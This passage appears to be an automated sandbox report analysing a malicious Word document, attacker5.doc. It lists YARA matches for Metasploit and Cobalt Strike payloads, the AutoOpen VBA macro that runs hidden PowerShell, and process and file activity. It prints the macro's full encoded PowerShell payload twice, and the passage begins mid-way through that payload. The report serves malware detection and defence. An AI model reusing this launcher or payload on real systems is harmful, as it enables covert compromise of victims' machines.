AbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzJump to behavior

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
    Source: 00000002.00000002.417824735.0000000000350000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth
    Source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
    Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
    Source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
    Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTRMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
    Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTRMatched rule: Detects hack tool used in Operation Wilted Tulip - Windows Tasks Author: Florian Roth
    Document contains an embedded VBA macro which may execute processesShow sources
    Source: attacker5.docOLE, VBA macro line: Shell "powershell -nop -w hidden -encodedcommand " & CatchMeIfYouCan.SquidGame.ControlTipText
    Source: ~DF8739F9799F11C9B7.TMP.0.drOLE, VBA macro line: JbxHook_Shell_1_ = Shell(jbxparam0)
    Very long command line foundShow sources
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Commandline size = 7490
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: Commandline size = 7490Jump to behavior
    Document contains an embedded VBA macro with suspicious stringsShow sources
    Source: attacker5.docOLE, VBA macro line: Shell "powershell -nop -w hidden -encodedcommand " & CatchMeIfYouCan.SquidGame.ControlTipText
    Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function AutoOpen, String powershell: Shell "powershell -nop -w hidden -encodedcommand " & CatchMeIfYouCan.SquidGame.ControlTipTextName: AutoOpen
    Source: ~DF8739F9799F11C9B7.TMP.0.drOLE, VBA macro line: JbxHook_Shell_1_ 3, "powershell -nop -w hidden -encodedcommand " & CatchMeIfYouCan.SquidGame.ControlTipText
    Source: attacker5.doc, type: SAMPLEMatched rule: Office_AutoOpen_Macro date = 2015-05-28, hash5 = 7c06cab49b9332962625b16f15708345, hash4 = a3035716fe9173703941876c2bde9d98, hash3 = 66e67c2d84af85a569a04042141164e6, hash2 = 63f6b20cb39630b13c14823874bd3743, author = Florian Roth, description = Detects an Microsoft Office file that contains the AutoOpen Macro function, hash7 = 25285b8fe2c41bd54079c92c1b761381, hash6 = bfc30332b7b91572bfe712b656ea8a0c, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4d00695d5011427efc33c9722c61ced2
    Source: 00000002.00000002.418638987.0000000002DA7000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
    Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
    Source: 00000002.00000002.417824735.0000000000350000.00000004.00000020.sdmp, type: MEMORYMatched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.421677056.0000000003ADF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
    Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
    Source: 00000002.00000002.420764427.0000000003737000.00000004.00000001.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
    Source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.421630363.0000000003AA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
    Source: 00000002.00000002.420980701.000000000389D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
    Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTRMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTRMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
    Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTRMatched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
    Source: Process Memory Space: powershell.exe PID: 1292, type: MEMORYSTRMatched rule: WiltedTulip_WindowsTask date = 2017-07-23, hash5 = 984c7e1f76c21daf214b3f7e131ceb60c14abf1b0f4066eae563e9c184372a34, hash4 = 5046e7c28f5f2781ed7a63b0871f4a2b3065b70d62de7254491339e8fe2fa14a, hash3 = b6f515b3f713b70b808fc6578232901ffdeadeb419c9c4219fbfba417bba9f01, hash2 = 340cbbffbb7685133fc318fa20e4620ddf15e56c0e65d4cf1b2d606790d4425d, hash1 = c3cbe88b82cd0ea46868fb4f2e8ed226f3419fc6d4d6b5f7561e70f4cd33822c, author = Florian Roth, description = Detects hack tool used in Operation Wilted Tulip - Windows Tasks, reference = http://www.clearskysec.com/tulip, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP, type: DROPPEDMatched rule: SUSP_VBA_FileSystem_Access date = 2019-06-21, author = Florian Roth, description = Detects suspicious VBA that writes to disk and is activated on document open, reference = Internal Research, score = 52262bb315fa55b7441a04966e176b0e26b7071376797e35c80aa60696b6d6fc
    Source: ~DF93C02D3A080000CF.TMP.0.drOLE indicator application name: unknown
    Source: ~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp.0.drOLE indicator application name: unknown
    Source: ~DF8739F9799F11C9B7.TMP.0.drOLE indicator application name: unknown
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_000007FF0029428D2_2_000007FF0029428D
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_000007FF00292CA92_2_000007FF00292CA9
    Source: attacker5.docOLE, VBA macro line: Sub AutoOpen()
    Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function AutoOpenName: AutoOpen
    Source: ~DF8739F9799F11C9B7.TMP.0.drOLE, VBA macro line: Sub AutoOpen()
    Source: ~DF93C02D3A080000CF.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~DF8739F9799F11C9B7.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~DF93C02D3A080000CF.TMP.0.drOLE indicator has summary info: false
    Source: ~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp.0.drOLE indicator has summary info: false
    Source: ~DF8739F9799F11C9B7.TMP.0.drOLE indicator has summary info: false
    Source: attacker5.docOLE indicator, VBA macros: true
    Source: ~DF8739F9799F11C9B7.TMP.0.drOLE indicator, VBA macros: true
    Source: attacker5.docVirustotal: Detection: 49%
    Source: attacker5.docMetadefender: Detection: 40%
    Source: attacker5.docReversingLabs: Detection: 45%
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................?.................|...............|.......w.....`Iy........v.....................K......................................Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?................t.j....................................}..v............0.................d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K.......g.e.:. ....j......d.............................}..v....0.......0...............h.d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K................t.j....................................}..v....h.......0.................d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W.......A.t. .l.i.n.e.:.3.9. .c.h.a.r.:.8.2.............}..v....x.......0...............h.d.....$.......,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W................t.j....0...............................}..v............0.................d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................{.j......d.............................}..v....x.......0...............................,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c................t.j....0...............................}..v............0.................d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o.......i.v.e.-.J.o.b. .<.<.<.<. .......................}..v....P.......0...............h.d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....o................t.j....................................}..v............0.................d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................{.j......d.............................}..v....P.......0...............................,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....{................t.j....................................}..v............0.................d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................{.j......d.............................}..v....0.......0...............................,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................t.j....................................}..v....h.......0.................d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................{.j......d.............................}..v....0.......0...............................,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................t.j....................................}..v....h.......0.................d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ . . .J.o.b.C.o.m.m.a.n.d.......................}..v............0...............h.d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................t.j....................................}..v....@.......0.................d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ ........{.j......d.............................}..v............0...............h.d.............,...............Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.....................t.j....................................}..v............0.................d.............,...............Jump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAz
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAGwAcwBhAGcAcQBJAGwANwBhADYAcwBPAEsAQwBnAHEAKwBJAEoAdgBNAFMAZQBWAEcAbQBCAFEAbABIAGMARwBrAEoAegBkAC8AMwA0AGEAMQBKAHoAcwAzAGUAeQA5AFcAMwBXAHYAVgBaAFQARABUAEgAZABQADkAOQBQAFAAOQBEAFEASwBKAG4AYwBLAEMAVQB5AE4AUwBLADYATwBxAGIAcwBWAEQAawBMAFQAZABhAGgARwBvAFgARABiAGMAMABWAEMAZgBhAFgAKwBLAEIAYQBNAHkATgBGAEkATgBwADAATgBYAG4AZQBZAHYASABxAEIAcQA3ADAAaQBYAFEAOQB3AEcARgBKAC8ARgBXADYAbQBLAEUAQQAyAFYAYgBxAE4AVQBmAEIAcQB1ADMAcABrADQAUwBxAFYAdgAyAFMAQwBXAEkAOABDAFgATAA2ADUASwBkAHoAawBVADUARQBUAEkAZwBPAC8ATwBvAGkAWQBNAFgANgAxAE0AZABtADcAZQBnAGcAYgBsAFoANQBaAHoAKwB1ADUATgBqAEsAZABsAHkAOQBmAHUAbABFAFEAWQBJAGUAYwAzADIAdAA5AFQATgBnAHcAeABMAFoAcQBtAFQAZwBzAGwAYQBsAHYAMQBIAHEAUABBADMAdwAzAFUAUQA5AFkASQA5AFIAZgAxAE8AMQByAHIAVwArADUASwByAEkAdQBZAG0AawBYAGEAWABzAEkAaQBIAFgAMABiAEcAMwBzAGEAaQBpAEwAbwBLAFoANABsAGsAbABLAHgAVAAvAC8ATABKAGEAZgA3ACsAbwB2AE4AZAA2AFAAawBCAFcAVwBpAGsAbwBhAEUAbQB6AFgAZABNAHMAcQBsAHEAbgB2ADUAVwB6AEQAUgBlAHIAaABVAGwARQB5AHQAYwBBAE4AWABZAFAAVQAxAHEAYgBEAE4ARwByAEwAMwBIAHMANQBkADEANAA2ACsAMQA0AHMAWAB5AEwAYgBlAFEAagBpACsASABXAFEAbQBkAFcAegBUAHEAawBJAHcAeQBsAGcAdwA1ADQAeABMAEYAYQBwADUAMgB5AC8ANQA1AGMAWAA2AG8AOQAzAGIAKwBhAFIAUQAwAHcAYgAxADAAUwBIADQATQBEADEARgBCAHoARQBwAG8AYgBEADIAZwBBADUAdQBvAFgAbgAyAEEAQwAxAFkAZwBqAHAAYwAzAGIARgBNAGoAZwBSAFkAQgBJAEYARABuAFgAMQBCAGYAUgBpADkANABoAEwAdAAwADUAawBXAFYAVwB3ACsALwB5ADcAZABsADkASwBNAGsANgB1ADQAUAA2AHUAVQB1AG0AagBFAGsAaABOAFMAVgBDAHUAWABqAGoAeABPADMAQgBJAE8AVwAvAE8ANQBpAEMAYwBuADcAegAvAFEASwA0AHkALwBIADQAaQBXAEwAbgB3AHYAZgBBAEoAVgBYAFYAcwA0AFIAMABpACsASgBVAEEAdgBoACsANABXAHIAaQA1AGUAYwA2AEgARwBPAEkAcABUAGQAMwBRAHoAUABXACsAVQBuAFMAVgBrAHMAQQBKAFIATgB3AGcAegBkAEsANQBDAEMASgBjAGYAdgBrAG4AUAArAGQAdAByADUAcABoADkAWgBlAEcANgBsAGUAdABpADgANAA1AFAAVwBjAC8AdgBsAEwAUABLADkAZgBVAFgAdwBvADMANQBjAEsARgBQAGQAbgA4AHEAeABxAFoAbABvADYARABiAFAAMwBYAHAANgBHAEgARABkAFAAQgB2AGQAUgBCAHQAcQBsAGQAQwBWAC8ANgBMAEcAZgBZAHMASABDAE8AUgArADAAcQBKAG8ATwBmAHAAZQBKAGwAQQBlAHUAOQBDAHoAcgBGAEQATgBEAG4AbgA5AFYANAAyAHkAVAB2AHUAdAB6AFoATwBWAGEARAB2AEkAZgBnAEYAVgBDAGkALwBLAE0AegA1AHgAeQBXAGkAcQBJAGoAWQBSAHYAdwBPADcAOABEAFQAVwA4AE4ATwBHAGIANABLAG4AMAA1AFcAdQBsADEAOQArAHcAOQA0ADMATABYAFEAbQBGAFkAcABhAFkAUgBuAEgATwB0AFMAaQBrAFkAVwBWAGkAdgBVAHEAdwBUAG0AcABjAGwATgBpAEoAdQBQAGkAegArADQANgA0AFUAVwBjAFQAVQBVAEUAaQB1ADUAbAA3AEsAbgAwAEIANgAyAGIAcgByAE8AbgBCAGkASQBnADIAeQBDAHoAQQBzAEYAQQA5AHIASgByAEkAeQBWAEsAcgBVAHcATgBRAHgAbAB5AHIAbQA3AHUAcABDADgAVgBOAE0AdQBzAGkAeQA0AE0AaQBCAHAAUgBoAHkAQQBqAE0AWgBGAGcAcgBKAE8AQgBQAG8AMQBYAC8AbgBSADcAbQBtAFkAQwBMAGEAbgBvAFYAdABrAE0ANgByAGsARwBDAGgASABkAFMAYwB5ADQAbgBLADYAWQBaADIAVwBDAC8AKwBCADcAZQB2ADUAKwBSADgASwBEAEsAcwByAGkAQgA5AGMAQgBvAEkAbwBGAGcAdQBxAFYASQByAE0AeQBCAFEAMQA0AHIAVgBuADQAagAzJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfileJump to behavior
    Source: attacker5.docOLE indicator, Word Document stream: true
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$tacker5.docJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCBA7.tmpJump to behavior
    Source: classification engineClassification label: mal100.bank.troj.expl.evad.winDOC@5/15@0/1
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
    Source: attacker5.docOLE document summary: title field not present or empty
    Source: ~DF93C02D3A080000CF.TMP.0.drOLE document summary: title field not present or empty
    Source: ~DF93C02D3A080000CF.TMP.0.drOLE document summary: author field not present or empty
    Source: ~DF93C02D3A080000CF.TMP.0.drOLE document summary: edited time not present or 0
    Source: ~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp.0.drOLE document summary: title field not present or empty
    Source: ~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp.0.drOLE document summary: author field not present or empty
    Source: ~WRF{6B5ACF7C-A8AD-4685-9DCC-FB49D0970A68}.tmp.0.drOLE document summary: edited time not present or 0
    Source: ~DF8739F9799F11C9B7.TMP.0.drOLE document summary: title field not present or empty
    Source: ~DF8739F9799F11C9B7.TMP.0.drOLE document summary: author field not present or empty
